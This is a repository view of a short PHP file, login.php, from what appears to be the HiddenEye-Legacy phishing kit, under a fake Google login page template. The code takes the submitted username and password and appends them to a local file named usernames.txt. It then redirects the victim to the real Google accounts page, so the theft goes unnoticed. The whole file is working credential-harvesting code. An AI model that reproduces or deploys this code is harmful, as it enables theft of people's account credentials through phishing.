HiddenEye-Legacy/WebPages/google_advanced_web/login.php

7 lines
215 B
PHP
Raw Normal View History

2018-04-24 13:30:11 +08:00
<?php
include 'base.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://accounts.google.com');
2018-04-24 13:30:11 +08:00
exit();